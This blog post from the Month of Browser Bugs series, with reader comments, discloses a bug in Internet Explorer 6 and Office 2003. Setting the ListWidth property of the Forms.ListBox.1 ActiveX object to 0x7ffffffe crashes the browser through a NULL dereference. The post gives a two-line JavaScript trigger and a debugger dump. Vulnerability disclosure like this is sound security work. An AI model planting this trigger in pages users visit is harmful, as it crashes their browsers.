MoBB #24: Forms.ListBox.1 ListWidth
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.
var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;
Demonstration
eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????
This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow
posted by hdm @ 11:54 PM
3 comments
links to this post
3 Comments:
These bugs are interesting and all... but most of them aren't really browser bugs. In this case, Forms.ListBox.1 is owned by Office, thus it's an Office bug. The majority of your ActiveXObject bugs have involved objects that are not part of IE, and most that aren't even part of Windows.
Sure, the easiest attack vector is the browser, but this could just as easily be exploited by a malicious Word document, or running a malicious script with the Windows Scripting Host.
That is true - the focus of the blog has shifted a bit from specific browser vulnerabilities to any type of attack that can be carried out through a browser. My reasoning for including ActiveX in this case (but not, say, PDF or Flash), is that ActiveX is a core feature of IE and its use has been encouraged in the developer documentation. IE 6 includes a handful of ActiveX controls specifically designed to be used within the browser. If Mozilla's XPCOM stuff was similarly exposed, it would also be a good candidate for this blog. Since ActiveX is such a integral part of the IE browser, not covering these flaws may give the wrong impression about the security of the browser. I see a difference between an ActiveX-based attack on an Office component and forcing the user to load an actual Word document, but I see your point about including non-default components in the MoBB posts.
What'll be interesting to see, is how many of these ActiveX attacks will have been impossible with IE7, due to ActiveX opt-in.
Post a Comment
Links to this post:
Create a Link
<< Home